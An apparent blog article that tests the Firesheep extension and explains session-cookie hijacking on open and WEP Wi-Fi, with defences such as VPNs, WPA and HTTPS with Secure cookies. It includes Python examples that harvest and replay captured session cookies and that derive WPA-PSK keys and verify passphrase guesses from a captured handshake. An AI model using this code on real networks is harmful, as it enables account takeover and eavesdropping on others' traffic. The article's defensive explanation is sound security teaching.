Derek Schauland took the Firesheep extension for Firefox out for a spin and discovered how easy it makes hijacking other people's logged-in sessions on open wireless networks. Here is his take on how to protect yourself.
Recently a new plug-in for Mozilla Firefox called Firesheep was released. It captures the session cookies that unsuspecting users on an open wireless network send to a rather wide array of websites, such as Facebook and Twitter, over plain HTTP. Whoever holds those cookies is logged in as that user, with no need for the password itself.
The plug-in was created to drive home the point that websites need to take better responsibility for their users' data. Encrypting only the login page while sending the rest of the session, cookies included, over plain HTTP is exactly what makes the attack possible; the fix is HTTPS for the whole session, with session cookies marked Secure so browsers never send them in the clear.
Firesheep makes hacking really easy (and scary)
Because trying out the technology is part of the fun of blogging, I decided to see what this plug-in was all about and installed it in Firefox. Then I thought I would test it out. Note: I used my own open wireless network and laptops for testing for this article. I did not compromise any user credentials in testing this plug-in.
After installing Firesheep, I connected that computer to my MiFi and started looking for information.
Then I connected another laptop to the open network and logged into Facebook. Almost before I had finished logging in, my credentials appeared in Firesheep. Then I logged into Twitter using the web client, and the same thing happened there.
This being the first time I had used Firesheep, I was a bit surprised at how fast it gathered my information. WOW.
Not only does it capture the session, using it is as simple as a double-click on the entry in the sidebar: Firesheep loads the captured cookies into your own browser and opens the site, already signed in as the victim. The password is never needed.
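To make the mechanism concrete, here is a small Python sketch of what a Firesheep-style tool does with the plaintext HTTP it sees on a shared network, followed by the server-side check that takes a site off its list. This is an added illustration for this article, not Firesheep's own code; the hostnames (`social.example`, `micro.example`), cookie names and "captured" requests are all constructed for the example.

```python
"""Mini Firesheep: what the plug-in does with the plaintext HTTP it sees on a
shared network, and the cookie attribute that takes a site off its list.

Added illustration for this article, not Firesheep's own code. The hostnames,
cookie names and "captured" requests below are constructed for the example."""

# Firesheep ships one handler per site naming the cookies that make up a
# logged-in session. These hostnames and cookie names are invented.
HANDLERS = {
    "social.example": ("c_user_id", "sess"),
    "micro.example": ("_micro_sess", "auth_token"),
}

# Constructed captures: what a sniffer on an open Wi-Fi network sees from
# three nearby clients. Only http:// traffic is readable; an https:// request
# reaches the sniffer as TLS records and never gets this far.
CAPTURED_REQUESTS = [
    b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
    b"Cookie: c_user_id=1001; sess=4f8a21bd; locale=en_US\r\n\r\n",
    b"GET /timeline HTTP/1.1\r\nHost: micro.example\r\n"
    b"Cookie: _micro_sess=BAh7Zz; auth_token=9c2e77\r\n\r\n",
    # This client's site marked its session cookies Secure: the browser
    # refuses to attach them to an http:// request, so only a harmless
    # preference cookie travels in the clear.
    b"GET /feed HTTP/1.1\r\nHost: social.example\r\n"
    b"Cookie: locale=en_US\r\n\r\n",
]


def parse_request(raw: bytes):
    """Return (host, cookies) from one plaintext HTTP/1.x request."""
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for pair in headers.get("cookie", "").split(";"):
        name, _, value = pair.strip().partition("=")
        if name:
            cookies[name] = value
    return headers.get("host", "").lower(), cookies


def harvest(captures):
    """Firesheep's sidebar: every complete session visible in plaintext."""
    sessions = []
    for raw in captures:
        host, cookies = parse_request(raw)
        wanted = HANDLERS.get(host)
        if wanted and all(name in cookies for name in wanted):
            sessions.append((host, {n: cookies[n] for n in wanted}))
    return sessions


def replay_header(session):
    """The double-click: the Cookie header the attacker's browser sends to the
    site to be treated as the victim. No password is involved at any point."""
    host, cookies = session
    return "Cookie: " + "; ".join(f"{n}={v}" for n, v in cookies.items())


def audit_set_cookie(set_cookie: str):
    """Server-side check. Without the Secure attribute a browser sends the
    cookie over plain http:// too, which is exactly what Firesheep reads.
    HttpOnly does not help here: it only hides the cookie from scripts."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].partition("=")[0]
    attrs = {p.partition("=")[0].lower() for p in parts[1:]}
    return name, "secure" in attrs


if __name__ == "__main__":
    for session in harvest(CAPTURED_REQUESTS):
        print(session[0], "->", replay_header(session))
    for hdr in ("sess=4f8a21bd; Path=/; HttpOnly",
                "sess=4f8a21bd; Path=/; Secure; HttpOnly"):
        print(audit_set_cookie(hdr))
```

Two of the three constructed clients are hijackable; the third is not, because its site set the session cookie with the Secure attribute and the browser therefore never put it on the wire in the clear. Secure cookies only work when the site also serves the whole session over HTTPS, otherwise the browser's http:// requests simply arrive logged out.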
What if I just stay off of open wireless networks?
This is a good idea in general. However, if someone on your own wireless network is running Firesheep and you log in to one of the affected websites, it will grab your session cookies and show the session in the sidebar. The likelihood of anyone running Firesheep on a trusted network, i.e., your workplace or home, is probably slim to none, but nothing stops someone from trying.
Why anyone would run either an open Wi-Fi network or a WEP-encrypted one in a business setting is a bit beyond me. WEP was good enough when it was the only option, but WPA runs circles around it and is certainly better than an open network. Because access to information is just as crucial these days as access to the super-secret file cabinet in the HR manager's office, use the highest level of security offered to protect your information from employees and non-employees alike. Access points are relatively cheap today (depending on your needs), and getting a wireless infrastructure up to WPA takes very little spend or configuration effort. One caveat: on a WPA or WPA2 network with a single shared passphrase, anyone who knows that passphrase and captures a client's association handshake can derive that client's key and decrypt its traffic, so a coffee-shop network with the password on the wall is only a speed bump. WPA2-Enterprise (802.1X) gives each user separate keys, and either way HTTPS for the whole session is the real fix.
What about other browsers?
I tried Chrome, Internet Explorer and Firefox with Firesheep running and was able to capture the credentials for Facebook and Twitter.
What can I do to keep my information safe?
In a previous post, I covered a personal VPN service called WiTopia that encrypts your traffic from your PC all the way to WiTopia's servers. Requests for sites are sent on from there, and the responses come back to you through the same encrypted tunnel. Anyone sniffing the wireless network sees only the tunnel, which virtually eliminates the problem on the local hop; between the VPN exit and an HTTP-only website the traffic is still in the clear.
Now that Firesheep is around, and I have seen how easy it is to get hold of information for some sites, the $60 annual price tag for encrypted data on any connection via a personal VPN is worth the price of admission for me, especially since you are allowed to install the application on any computers you own (as long as you only use them one at a time).
Note: VPN connections or other proxy connections that you may have access to will also encrypt your traffic, provided the connection to the proxy is itself encrypted (an SSH tunnel, for example); they may be free or provided by your workplace.
Further research shows some Wi-Fi is okay
I tried several types of wireless networks to see which would allow Firesheep to gather information.
- Open - allows easy information capture
- WEP - allows information capture by other connected users
- WPA - does not allow information capture by Firesheep
I was quite surprised that WEP would still allow Firesheep to capture information and glad to know that attempts to collect information on WPA wireless networks did not work.
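The results above match how the three network types handle keys: WEP gives every client the same static key, so any user can decrypt any other user's frames, while WPA derives a separate pairwise key per client, which is why a passive sniffer such as Firesheep comes up empty. That per-client key is not a secret from other users who know the passphrase, though. The following Python example, added here and not part of the original article, walks through the WPA-PSK derivation: the shared passphrase becomes the PMK, the PMK plus values sent in the clear during the 4-way handshake become the client's pairwise key, and the handshake's message-integrity code lets an eavesdropper confirm a passphrase guess. The MAC addresses, nonces, EAPOL frame stand-in and network name (`CafeNet`) are constructed; only the passphrase/SSID pair `password`/`IEEE` is real, being the IEEE 802.11 Annex test vector.

```python
"""Why a WPA/WPA2 network with a shared passphrase is not a fix for Firesheep.

Added example for this article, not from the original. WPA-PSK derives a
per-client pairwise key from the passphrase plus values exchanged in the
clear during the 4-way handshake, so another user who knows the passphrase
can derive a victim's key from a captured handshake. MAC addresses, nonces,
the EAPOL frame stand-in and the network name are constructed; the
"password"/"IEEE" pair is the IEEE 802.11 Annex test vector."""
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    Everyone who knows the passphrase for this SSID gets the same PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ieee_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> dict:
    """Pairwise Transient Key for CCMP (48 bytes): KCK | KEK | TK.
    Everything here except the PMK is visible to anyone sniffing the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = ieee_prf(pmk, b"Pairwise key expansion", data, 48)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 with AKM 00-0F-AC:2: MIC = first 16 bytes of HMAC-SHA1 over the
    EAPOL-Key frame with its MIC field zeroed (WPA1 uses HMAC-MD5)."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(candidate: str, ssid: str, handshake: dict,
                     eapol_msg2_zeroed: bytes, captured_mic: bytes) -> bool:
    """What an eavesdropper does with a captured handshake: derive the KCK from
    a candidate passphrase and see whether it reproduces message 2's MIC.
    A match confirms the passphrase, and the same derivation yields the
    victim's TK, i.e. the key protecting the victim's traffic."""
    kck = wpa_ptk(wpa_pmk(candidate, ssid), **handshake)["kck"]
    return hmac.compare_digest(eapol_mic(kck, eapol_msg2_zeroed), captured_mic)


# Constructed network and handshake, as an eavesdropper would record them:
# AP and victim MAC addresses plus ANonce/SNonce from EAPOL messages 1 and 2.
SSID = "CafeNet"                     # constructed
PASSPHRASE = "coffee shop wifi"      # constructed, "written on the wall"
HANDSHAKE = {
    "ap_mac": bytes.fromhex("001122334455"),
    "sta_mac": bytes.fromhex("66778899aabb"),
    "anonce": bytes(range(32)),
    "snonce": bytes(range(32, 64)),
}
# Stand-in for EAPOL message 2 with its 16-byte MIC field already zeroed.
EAPOL_MSG2_ZEROED = bytes.fromhex("0103005f02010a00") + bytes(8) + HANDSHAKE["snonce"] + bytes(42)
# The MIC the victim's client actually transmitted (simulated with the real passphrase).
CAPTURED_MIC = eapol_mic(wpa_ptk(wpa_pmk(PASSPHRASE, SSID), **HANDSHAKE)["kck"], EAPOL_MSG2_ZEROED)


def client_tk(passphrase: str, ssid: str, handshake: dict) -> bytes:
    """The temporal key a given client ends up using for its data frames."""
    return wpa_ptk(wpa_pmk(passphrase, ssid), **handshake)["tk"]


if __name__ == "__main__":
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    for guess in ("free wifi", PASSPHRASE):
        print(f"guess {guess!r}:", check_passphrase(guess, SSID, HANDSHAKE, EAPOL_MSG2_ZEROED, CAPTURED_MIC))
```

The two facts the code makes visible are the ones that matter for this article. First, two clients on the same network get different temporal keys because their nonces differ, so a tool that merely listens, as Firesheep does, cannot read a neighbour's frames on WPA. Second, the only secret in the whole derivation is the passphrase; a neighbour who knows it and captured the handshake recovers the victim's key and is back to reading cookies. Per-user credentials (WPA2-Enterprise) remove the shared secret, and HTTPS for the whole session removes the cookies from the wire regardless of the network.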
So what is the bottom line?
There have always been ways to get at people's data with fairly simple attacks, especially on unsecured networks, but Firesheep makes it extremely easy for the masses. If you don't already have access to a VPN connection, services like WiTopia are a good way to help ensure your data is a bit more secure when using wireless networks, regardless of their security level.